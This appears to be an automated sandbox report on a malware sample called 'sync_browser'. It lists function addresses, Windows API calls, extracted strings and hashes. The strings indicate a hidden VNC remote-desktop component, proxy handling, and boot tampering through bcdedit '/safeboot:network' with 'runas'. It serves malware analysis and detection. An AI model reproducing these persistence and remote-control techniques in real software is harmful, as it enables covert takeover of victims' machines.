                                                      • Part of subcall function 00007FF7D5987650: RegCreateKeyExA.ADVAPI32 ref: 00007FF7D59876DD
                                                      • Part of subcall function 00007FF7D5987650: RegCreateKeyExA.ADVAPI32 ref: 00007FF7D5987722
                                                      • Part of subcall function 00007FF7D59877F0: GetPrivateProfileIntA.KERNEL32 ref: 00007FF7D5987840
                                                      • Part of subcall function 00007FF7D59877F0: RegQueryValueExA.ADVAPI32 ref: 00007FF7D598787D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: PrivateProfile$Create$FileModuleNameQueryValue
                                                    • String ID: UseRegistry$admin$locdom1
                                                    • API String ID: 1788981264-2648182776
                                                    • Opcode ID: 90366ba7cc0c0a2881363750c1573ef4067fd92e56bfccd46d2f838935763d96
                                                    • Instruction ID: da3734ec3bb3c59e92027f407c39ec28ff7b03f3dbc587fbd2ef931ada1bcd75
                                                    • Opcode Fuzzy Hash: 90366ba7cc0c0a2881363750c1573ef4067fd92e56bfccd46d2f838935763d96
                                                    • Instruction Fuzzy Hash: CD015E61A1895383FB24BB24E491BBDAA51EF98B08FC00037ED1D46692DF3DE548D670
                                                    APIs
                                                      • Part of subcall function 00007FF7D593D390: GetModuleFileNameA.KERNEL32 ref: 00007FF7D593D3BB
                                                    • GetPrivateProfileIntA.KERNEL32 ref: 00007FF7D5987F8D
                                                      • Part of subcall function 00007FF7D5987650: GetPrivateProfileIntA.KERNEL32 ref: 00007FF7D5987689
                                                      • Part of subcall function 00007FF7D5987650: RegCreateKeyExA.ADVAPI32 ref: 00007FF7D59876DD
                                                      • Part of subcall function 00007FF7D5987650: RegCreateKeyExA.ADVAPI32 ref: 00007FF7D5987722
                                                      • Part of subcall function 00007FF7D59877F0: GetPrivateProfileIntA.KERNEL32 ref: 00007FF7D5987840
                                                      • Part of subcall function 00007FF7D59877F0: RegQueryValueExA.ADVAPI32 ref: 00007FF7D598787D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: PrivateProfile$Create$FileModuleNameQueryValue
                                                    • String ID: UseRegistry$admin$locdom3
                                                    • API String ID: 1788981264-1943432916
                                                    • Opcode ID: 9d8487c70b1b00fa5a82c873ed5b00f7b51de020590ec98eeb4ab258b7261688
                                                    • Instruction ID: c2dd7c33863b4eeb3b98f6b6d23d9ac5bd09c943e729b2d40bf469922f9315cb
                                                    • Opcode Fuzzy Hash: 9d8487c70b1b00fa5a82c873ed5b00f7b51de020590ec98eeb4ab258b7261688
                                                    • Instruction Fuzzy Hash: A7015E61A1895283FA24FB35A491BBDEB91EF88B08FC50433ED1D46592CF3DE145D630
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorFindMode$CloseFileFirst
                                                    • String ID:
                                                    • API String ID: 2885216544-0
                                                    • Opcode ID: 0223ee3f43c164e8854e7b1b386b18195b9e4c924526049b6427bad48412c67f
                                                    • Instruction ID: 312a53801417091918666000ecdb882c5057d749dfe6b737c22a813ba611ba06
                                                    • Opcode Fuzzy Hash: 0223ee3f43c164e8854e7b1b386b18195b9e4c924526049b6427bad48412c67f
                                                    • Instruction Fuzzy Hash: 59013035A1868587EA249B25B4546ADA3A1FB8CFE4FC04231EE6D53798CE3DD8458B10
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AddressProc$Library$FileLoad$DeleteFreeModuleName
                                                    • String ID: Config$CreateIntegratedPluginInterface$CreatePluginInterface$Description$FreeBuffer$GetParams$Reset$RestoreBuffer$SetParams$Shutdown$Startup$TransformBuffer
                                                    • API String ID: 1650122287-1031704962
                                                    • Opcode ID: 2e3427beeea8e7963a578434a2b2276026c969c33777596d628f9c5fe35e2b15
                                                    • Instruction ID: 8c0a13c996c88c810361929459e816e8d37a52a225e176b4f93d65d8c463319c
                                                    • Opcode Fuzzy Hash: 2e3427beeea8e7963a578434a2b2276026c969c33777596d628f9c5fe35e2b15
                                                    • Instruction Fuzzy Hash: C6811A32919A8686EB15AF34E4543ED67A0FF88F98FC44132DD5D5B298DF78E244C320
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Object$Select$Delete$CompatibleCreateIconMetricsSystem$CursorDrawFlushInfoRect
                                                    • String ID: F
                                                    • API String ID: 2202639625-1304234792
                                                    • Opcode ID: b79674502bec6eb6e9178b59d754768edd22f48091c48e79f06fd71b0c89d9c2
                                                    • Instruction ID: d78398f9f693e8c6146d2ad77dbb92dcaf2dd1164cb4d6e18c75670749f6aaa7
                                                    • Opcode Fuzzy Hash: b79674502bec6eb6e9178b59d754768edd22f48091c48e79f06fd71b0c89d9c2
                                                    • Instruction Fuzzy Hash: 4DC17E32A046A68FE754DF68D648DAEB7A9FF88B44F810537EE0953704DF789804CB20
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Window$MetricsSystem$Long$Load$AddressAdjustClassCreateCursorIconLibraryObjectProcRectRegisterShowStock
                                                    • String ID: 0$P$SetLayeredWindowAttributes$blackscreen$user32
                                                    • API String ID: 1337014749-2363801694
                                                    • Opcode ID: c8f613f4f1137cd039f0d77ff0fdd36da7c317fdbced729bc12fff3d257e6be4
                                                    • Instruction ID: 0a1e6279525696b0f7cda0895ffb3cd37d2eef6ab6a26401078ce92da1341708
                                                    • Opcode Fuzzy Hash: c8f613f4f1137cd039f0d77ff0fdd36da7c317fdbced729bc12fff3d257e6be4
                                                    • Instruction Fuzzy Hash: B5711A36A18B928AE714AF65F454A6EBBA0FF88B54F904136DE5D43798CF3CD044CB10
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: PrivateProfileString$EnvironmentVariable$AttributesErrorExecuteFileForegroundLastShellVersionWindowWrite
                                                    • String ID: /safeboot:network$/boot.ini$SYSTEMDRIVE$SystemRoot$\system32\$bcdedit.exe$boot loader$default$operating systems$runas$twork
                                                    • API String ID: 3746257916-1709497384
                                                    • Opcode ID: 0a761f6e527e6f89f9f2902e2f57a6bb5b8d7dbe4c16f5219fa40f45faea4ce6
                                                    • Instruction ID: 402f24a639b8effdb2746f928281c7f5c87649bcfb708b414a34dd318a73aa1f
                                                    • Opcode Fuzzy Hash: 0a761f6e527e6f89f9f2902e2f57a6bb5b8d7dbe4c16f5219fa40f45faea4ce6
                                                    • Instruction Fuzzy Hash: BD715B25A14A969AE7149F74E840AED7BA0FF48768FC01337EA6D136E8DF38D115C320
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _wgetenv$freeinet_ntoa$ErrorFreeHeapLast_errnomalloc
                                                    • String ID: HTTP_PROXY$SOCKS4_RESOLVE$SOCKS4_SERVER$SOCKS5_RESOLVE$SOCKS5_SERVER$SOCKS_RESOLVE$SOCKS_SERVER$http://
                                                    • API String ID: 3609861302-2295524587
                                                    • Opcode ID: 198aee5947f50ad03e8d7cc14805ac6ff2a6e37fde4bc76060f889befd90e49f
                                                    • Instruction ID: 7c502cc8c0fd6b26331ddc221b9e1f14812165ea1cb6cb9ae8265dbe620f53a1
                                                    • Opcode Fuzzy Hash: 198aee5947f50ad03e8d7cc14805ac6ff2a6e37fde4bc76060f889befd90e49f
                                                    • Instruction Fuzzy Hash: 2FA16061A0968287FE65BB2594502BDA691EF64F88FC80437DE5D47796EF3CE901C320
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: DesktopThread$CurrentObjectOpen$DeleteInformationInputInvalidateRectUser
                                                    • String ID: Default$vncdesktop.cpp : Break log$vncdesktop.cpp : Driver option disabled $vncdesktop.cpp : Driver option enabled $vncdesktop.cpp : EnableOptimisedBlits Failed$vncdesktop.cpp : InitBitmap Failed$vncdesktop.cpp : InitDesktop Failed$vncdesktop.cpp : InitDesktop...$vncdesktop.cpp : InitVideo driver Called$vncdesktop.cpp : Removing real Dib buffer and replace by driver communication buffer$vncdesktop.cpp : SetPalette Failed$vncdesktop.cpp : SetPixFormat Failed$vncdesktop.cpp : SetPixShift Failed$vncdesktop.cpp : ThunkBitmapInfo Failed$vncdesktop.cpp : no default desktop
                                                    • API String ID: 421987145-2663527212
                                                    • Opcode ID: 708c932f2a283d5bbc71d608cba7ab1ab0c10d4bb7afa53f10560fd6fcd4028b
                                                    • Instruction ID: d5b29faed7e4669cf76e3216a9d35c99f505f8a3cff065dc3eae27e9ffe92f8f
                                                    • Opcode Fuzzy Hash: 708c932f2a283d5bbc71d608cba7ab1ab0c10d4bb7afa53f10560fd6fcd4028b
                                                    • Instruction Fuzzy Hash: E1A117B1A0869782FA14BB64D4406BDA760EF84F58FD84033DD4E8B699DF3CE549C760
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: PrivateProfileString$EnvironmentVariable$AttributesExecuteFileForegroundShellVersionWindowWrite
                                                    • String ID: /boot.ini$SYSTEMDRIVE$SystemRoot$\system32\$bcdedit.exe$boot loader$default$eboot$operating systems$runas
                                                    • API String ID: 3443580464-3826360582
                                                    • Opcode ID: 8f405f99423453285309b5ba9db0ae769014fde6afb609773d47d48ac683e545
                                                    • Instruction ID: fc457cc76969bf1641f3a660c854d6f3c377c13851dffbb7483457a4514b53fe
                                                    • Opcode Fuzzy Hash: 8f405f99423453285309b5ba9db0ae769014fde6afb609773d47d48ac683e545
                                                    • Instruction Fuzzy Hash: BE617E31A18A969AE7149F74E840AED77A0FB48768FC01237EA6D576D8DF38D105C360
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Free$Globalswscanf$Library$AddressByteCharLoadMultiProcWide
                                                    • String ID: 443$P$WinHttpGetIEProxyConfigForCurrentUser$http=$https=$winhttp.dll
                                                    • API String ID: 3955186772-955988753
                                                    • Opcode ID: f80e017f8dfc52864f10a9d1c006d943c54cd3b71a26042b83a3869f240b4edf
                                                    • Instruction ID: 9b0296c7b45581da72c439f850f2d214fec7676eb8cffe80fb5e58dc5912dc15
                                                    • Opcode Fuzzy Hash: f80e017f8dfc52864f10a9d1c006d943c54cd3b71a26042b83a3869f240b4edf
                                                    • Instruction Fuzzy Hash: 18B1BC21A1DB8287FA15AB64D5502BDA7A0EF85BC8FD44136EE5D03AC9DF3DE506C320
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: freeinet_ntoa$_errnogetpeernamegetsockname$ErrorFreeHeapLast_invalid_parameter_noinfomalloc
                                                    • String ID: <unavailable>$Local loop-back connections are disabled.$vncclient.cpp : loopback connection attempted - client accepted$vncclient.cpp : loopback connection attempted - client rejected
                                                    • API String ID: 3199031719-36275550
                                                    • Opcode ID: c44d7390c6da1f5effd3baa685ac2797441d9ecea07109d0da10d2a128be3049
                                                    • Instruction ID: bba0b4e725bc536349e9750caad70159ba04aebbce1785c33116b1924238407c
                                                    • Opcode Fuzzy Hash: c44d7390c6da1f5effd3baa685ac2797441d9ecea07109d0da10d2a128be3049
                                                    • Instruction Fuzzy Hash: 73514D21A096428BEA58EB65E5442BDA7A0FF88F89FC44036DE4E47769DF3CE105C720
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
